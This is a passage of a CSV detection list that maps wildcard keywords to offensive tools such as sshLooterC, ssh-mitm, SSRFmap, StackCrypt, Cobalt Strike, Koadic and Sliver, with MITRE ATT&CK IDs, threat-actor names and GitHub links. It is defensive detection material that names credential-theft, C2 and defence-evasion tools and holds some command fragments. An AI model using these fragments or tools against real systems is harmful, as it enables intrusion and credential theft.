TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sshLooterC*","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","3","246","72","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z" +"*ssh-mitm*","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1548","210","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" +"*sshmon*hunt*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*sshmon*kill*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*ssh-putty-brute -*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*ssh-putty-brute.ps1*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*SSH-PuTTY-login-bruteforcer*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*sshuttle -r *0.0.0.0/24*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sslstrip*","offensive_tool_keyword","sslstrip","sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.","T1557.001 - T1573 - T1559 - T1542 - T1552","TA0002 - TA0011 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/moxie0/sslstrip","1","1","N/A","N/A","10","1821","418","2021-05-29T01:53:12Z","2011-04-24T06:40:08Z" +"*SspiUacBypass.cpp*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass.exe*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass-main*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SSploitEnumeration*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitEnumerationDomain*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitExecution_DynamicInvoke*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitExecution_Injection*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitLateralMovement*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitPersistence*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitPrivilegeEscalation*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*sspr2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ssrf --gopher --encode --scan-action filter-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*ssrfmap -r *.txt -p id -m readfiles*portscan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SSRFmap*","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*ssrfmap.py*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*StackCrypt-main*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.cpp*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.exe*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.sln*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.vcxproj*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*stage.obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*stage_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Stage-gSharedInfoBitmap*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stageless payload*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*StageListenerCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*stager/js/bitsadmin *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/disk*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/mshta*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/regsvr *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/rundll32_js *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/wmic *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager_bind_pipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*stager_bind_pipe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 